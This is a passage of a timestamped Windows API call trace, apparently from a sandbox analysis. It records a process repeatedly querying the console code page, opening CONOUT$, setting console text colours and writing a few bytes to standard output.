[0144.048] GetLastError () returned 0xcb [0144.048] GetConsoleOutputCP () returned 0x1b5 [0144.048] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.048] GetLastError () returned 0xcb [0144.048] GetConsoleOutputCP () returned 0x1b5 [0144.048] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.048] GetLastError () returned 0xcb [0144.048] GetConsoleOutputCP () returned 0x1b5 [0144.048] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.048] GetLastError () returned 0xcb [0144.048] GetConsoleOutputCP () returned 0x1b5 [0144.048] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.048] GetLastError () returned 0xcb [0144.048] GetConsoleOutputCP () returned 0x1b5 [0144.049] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.049] GetLastError () returned 0xcb [0144.049] GetConsoleOutputCP () returned 0x1b5 [0144.049] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.049] GetLastError () returned 0xcb [0144.049] GetConsoleOutputCP () returned 0x1b5 [0144.049] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.049] GetLastError () returned 0xcb [0144.049] GetConsoleOutputCP () returned 0x1b5 [0144.049] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.049] GetLastError () returned 0xcb [0144.049] GetConsoleOutputCP () returned 0x1b5 [0144.049] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.049] GetLastError () returned 0xcb [0144.049] GetConsoleOutputCP () returned 0x1b5 [0144.049] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.049] GetLastError () returned 0xcb [0144.049] GetConsoleOutputCP () returned 0x1b5 [0144.050] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.050] GetLastError () returned 0xcb [0144.050] GetConsoleOutputCP () returned 0x1b5 [0144.050] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.050] GetLastError () returned 0xcb [0144.050] GetConsoleOutputCP () returned 0x1b5 [0144.050] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.050] GetLastError () returned 0xcb [0144.050] GetConsoleOutputCP () returned 0x1b5 [0144.050] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.050] GetLastError () returned 0xcb [0144.050] GetConsoleOutputCP () returned 0x1b5 [0144.050] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.050] GetLastError () returned 0xcb [0144.050] GetConsoleOutputCP () returned 0x1b5 [0144.050] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.051] GetLastError () returned 0xcb [0144.051] GetConsoleOutputCP () returned 0x1b5 [0144.051] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.051] GetLastError () returned 0xcb [0144.051] GetConsoleOutputCP () returned 0x1b5 [0144.051] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.051] GetLastError () returned 0xcb [0144.051] GetConsoleOutputCP () returned 0x1b5 [0144.051] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.051] GetLastError () returned 0xcb [0144.051] GetConsoleOutputCP () returned 0x1b5 [0144.051] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.051] GetLastError () returned 0xcb [0144.051] GetConsoleOutputCP () returned 0x1b5 [0144.051] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.051] GetLastError () returned 0xcb [0144.051] GetConsoleOutputCP () returned 0x1b5 [0144.052] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.052] GetLastError () returned 0xcb [0144.052] GetConsoleOutputCP () returned 0x1b5 [0144.052] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.052] GetLastError () returned 0xcb [0144.052] GetConsoleOutputCP () returned 0x1b5 [0144.052] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.052] GetLastError () returned 0xcb [0144.052] GetConsoleOutputCP () returned 0x1b5 [0144.052] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.052] GetLastError () returned 0xcb [0144.052] GetConsoleOutputCP () returned 0x1b5 [0144.052] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.052] GetLastError () returned 0xcb [0144.052] GetConsoleOutputCP () returned 0x1b5 [0144.052] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.052] GetLastError () returned 0xcb [0144.053] GetConsoleOutputCP () returned 0x1b5 [0144.053] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.053] GetLastError () returned 0xcb [0144.053] GetConsoleOutputCP () returned 0x1b5 [0144.053] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.053] GetLastError () returned 0xcb [0144.053] GetConsoleOutputCP () returned 0x1b5 [0144.053] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.053] GetLastError () returned 0xcb [0144.053] GetConsoleOutputCP () returned 0x1b5 [0144.053] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.053] GetLastError () returned 0xcb [0144.053] GetConsoleOutputCP () returned 0x1b5 [0144.053] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.053] GetLastError () returned 0xcb [0144.053] GetConsoleOutputCP () returned 0x1b5 [0144.053] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.053] GetLastError () returned 0xcb [0144.054] GetConsoleOutputCP () returned 0x1b5 [0144.054] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.054] GetLastError () returned 0xcb [0144.054] GetConsoleOutputCP () returned 0x1b5 [0144.054] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.054] GetLastError () returned 0xcb [0144.054] GetConsoleOutputCP () returned 0x1b5 [0144.054] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.054] GetLastError () returned 0xcb [0144.054] GetConsoleOutputCP () returned 0x1b5 [0144.054] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.054] GetLastError () returned 0xcb [0144.054] GetConsoleOutputCP () returned 0x1b5 [0144.054] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.054] GetLastError () returned 0xcb [0144.054] GetConsoleOutputCP () returned 0x1b5 [0144.054] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.055] GetLastError () returned 0xcb [0144.055] GetConsoleOutputCP () returned 0x1b5 [0144.055] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.055] GetLastError () returned 0xcb [0144.055] GetConsoleOutputCP () returned 0x1b5 [0144.055] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.055] GetLastError () returned 0xcb [0144.055] GetConsoleOutputCP () returned 0x1b5 [0144.055] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.055] GetLastError () returned 0xcb [0144.055] GetConsoleOutputCP () returned 0x1b5 [0144.055] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.055] GetLastError () returned 0xcb [0144.055] GetConsoleOutputCP () returned 0x1b5 [0144.055] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.055] GetLastError () returned 0xcb [0144.055] GetConsoleOutputCP () returned 0x1b5 [0144.056] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.056] GetLastError () returned 0xcb [0144.056] GetConsoleOutputCP () returned 0x1b5 [0144.056] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.056] GetLastError () returned 0xcb [0144.056] GetConsoleOutputCP () returned 0x1b5 [0144.056] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.056] GetLastError () returned 0xcb [0144.056] GetConsoleOutputCP () returned 0x1b5 [0144.056] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.056] GetLastError () returned 0xcb [0144.056] GetConsoleOutputCP () returned 0x1b5 [0144.056] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.056] GetLastError () returned 0xcb [0144.056] GetConsoleOutputCP () returned 0x1b5 [0144.056] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.056] GetLastError () returned 0xcb [0144.056] GetConsoleOutputCP () returned 0x1b5 [0144.057] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.057] GetLastError () returned 0xcb [0144.057] GetConsoleOutputCP () returned 0x1b5 [0144.057] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.057] GetLastError () returned 0xcb [0144.057] GetConsoleOutputCP () returned 0x1b5 [0144.057] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.057] GetLastError () returned 0xcb [0144.057] GetConsoleOutputCP () returned 0x1b5 [0144.057] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.057] GetLastError () returned 0xcb [0144.057] GetConsoleOutputCP () returned 0x1b5 [0144.057] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.057] GetLastError () returned 0xcb [0144.057] GetConsoleOutputCP () returned 0x1b5 [0144.057] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.057] GetLastError () returned 0xcb [0144.057] GetConsoleOutputCP () returned 0x1b5 [0144.058] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.058] GetLastError () returned 0xcb [0144.058] GetConsoleOutputCP () returned 0x1b5 [0144.058] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.058] GetLastError () returned 0xcb [0144.058] GetConsoleOutputCP () returned 0x1b5 [0144.059] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.059] GetLastError () returned 0xcb [0144.059] GetConsoleOutputCP () returned 0x1b5 [0144.059] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.059] GetLastError () returned 0xcb [0144.059] GetConsoleOutputCP () returned 0x1b5 [0144.059] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.059] GetLastError () returned 0xcb [0144.059] GetConsoleOutputCP () returned 0x1b5 [0144.059] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.059] GetLastError () returned 0xcb [0144.059] GetConsoleOutputCP () returned 0x1b5 [0144.059] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.059] GetLastError () returned 0xcb [0144.059] GetConsoleOutputCP () returned 0x1b5 [0144.059] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.060] GetLastError () returned 0xcb [0144.060] GetConsoleOutputCP () returned 0x1b5 [0144.060] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.060] GetLastError () returned 0xcb [0144.060] GetConsoleOutputCP () returned 0x1b5 [0144.060] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.060] GetLastError () returned 0xcb [0144.060] GetConsoleOutputCP () returned 0x1b5 [0144.060] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.060] GetLastError () returned 0xcb [0144.060] GetConsoleOutputCP () returned 0x1b5 [0144.060] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.060] GetLastError () returned 0xcb [0144.060] GetConsoleOutputCP () returned 0x1b5 [0144.060] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.060] GetLastError () returned 0xcb [0144.060] GetConsoleOutputCP () returned 0x1b5 [0144.060] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.061] GetLastError () returned 0xcb [0144.061] GetConsoleOutputCP () returned 0x1b5 [0144.061] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.061] GetLastError () returned 0xcb [0144.061] GetConsoleOutputCP () returned 0x1b5 [0144.061] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.061] GetLastError () returned 0xcb [0144.061] GetConsoleOutputCP () returned 0x1b5 [0144.061] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.061] GetLastError () returned 0xcb [0144.061] GetConsoleOutputCP () returned 0x1b5 [0144.061] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.061] GetLastError () returned 0xcb [0144.061] GetConsoleOutputCP () returned 0x1b5 [0144.061] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.061] GetLastError () returned 0xcb [0144.061] GetConsoleOutputCP () returned 0x1b5 [0144.061] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeecb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeecb0) returned 0 [0144.061] GetLastError () returned 0xcb [0144.062] GetConsoleOutputCP () returned 0x1b5 [0144.062] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeecb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeecb0) returned 0 [0144.062] GetLastError () returned 0xcb [0144.062] GetConsoleOutputCP () returned 0x1b5 [0144.062] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeecb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeecb0) returned 0 [0144.062] GetLastError () returned 0xcb [0144.068] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0144.068] GetLastError () returned 0xcb [0144.068] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x5eeec88 | out: lpConsoleScreenBufferInfo=0x5eeec88) returned 1 [0144.069] GetLastError () returned 0xcb [0144.069] GetConsoleOutputCP () returned 0x1b5 [0144.069] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.069] GetLastError () returned 0xcb [0144.070] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0144.070] GetLastError () returned 0xcb [0144.070] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0x5eeed00 | out: lpMode=0x5eeed00) returned 0 [0144.071] GetLastError () returned 0x6 [0144.074] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0144.074] GetLastError () returned 0x6 [0144.074] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.075] GetLastError () returned 0x6 [0144.077] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0144.079] GetLastError () returned 0x6 [0144.079] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.080] GetLastError () returned 0x6 [0144.083] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0144.083] GetLastError () returned 0x6 [0144.083] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.083] GetLastError () returned 0x6 [0144.085] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0144.085] GetLastError () returned 0x6 [0144.089] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0144.089] GetLastError () returned 0x6 [0144.089] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.089] GetLastError () returned 0x6 [0144.089] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0144.089] GetLastError () returned 0x6 [0144.090] GetStdHandle (nStdHandle=0xfffffff5) returned 0x350 [0144.090] GetLastError () returned 0x6 [0144.090] GetConsoleMode (in: hConsoleHandle=0x350, lpMode=0x5eeec98 | out: lpMode=0x5eeec98) returned 0 [0144.090] GetLastError () returned 0x6 [0144.090] GetConsoleOutputCP () returned 0x1b5 [0144.093] GetFileType (hFile=0x350) returned 0x3 [0144.094] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x5eeec34, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec34*=0x4f, lpOverlapped=0x0) returned 1 [0144.095] GetLastError () returned 0x0 [0144.098] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0144.100] GetLastError () returned 0x0 [0144.100] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.100] GetLastError () returned 0x0 [0144.100] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0144.100] GetLastError () returned 0x0 [0144.100] CloseHandle (hObject=0x23) returned 1 [0144.101] GetLastError () returned 0x0 [0144.103] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0144.104] GetLastError () returned 0x0 [0144.104] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.104] GetLastError () returned 0x0 [0144.104] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0144.104] GetLastError () returned 0x0 [0144.104] CloseHandle (hObject=0x23) returned 1 [0144.105] GetLastError () returned 0x0 [0144.105] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5eeec74, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec74*=0x1, lpOverlapped=0x0) returned 1 [0144.106] GetLastError () returned 0x0 [0144.109] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0144.109] GetLastError () returned 0x0 [0144.109] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5eeec88 | out: lpConsoleScreenBufferInfo=0x5eeec88) returned 1 [0144.109] GetLastError () returned 0x0 [0144.110] GetConsoleOutputCP () returned 0x1b5 [0144.110] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.110] GetLastError () returned 0x0 [0144.113] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27 [0144.113] GetLastError () returned 0x0 [0144.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.113] GetLastError () returned 0x0 [0144.116] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b [0144.116] GetLastError () returned 0x0 [0144.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.116] GetLastError () returned 0x0 [0144.119] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0144.120] GetLastError () returned 0x0 [0144.120] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.120] GetLastError () returned 0x0 [0144.120] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0144.122] GetLastError () returned 0x0 [0144.122] CloseHandle (hObject=0x2f) returned 1 [0144.122] GetLastError () returned 0x0 [0144.125] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0144.125] GetLastError () returned 0x0 [0144.125] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5eeec30 | out: 